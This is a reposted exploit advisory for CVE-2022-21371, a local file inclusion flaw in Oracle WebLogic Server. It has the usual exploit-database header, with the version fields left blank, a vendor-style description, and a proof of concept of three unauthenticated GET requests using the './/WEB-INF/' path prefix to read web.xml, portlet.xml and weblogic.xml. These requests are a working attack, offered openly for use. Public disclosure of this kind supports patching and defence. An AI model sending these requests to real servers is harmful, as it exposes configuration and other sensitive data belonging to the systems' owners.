Sunday, February 27, 2022

Oracle WebLogic Server - Local File Inclusion

# Exploit Title: Oracle WebLogic Server - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage:
# Software Link:
# Version:,, and
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are,,
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.

# PoC
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore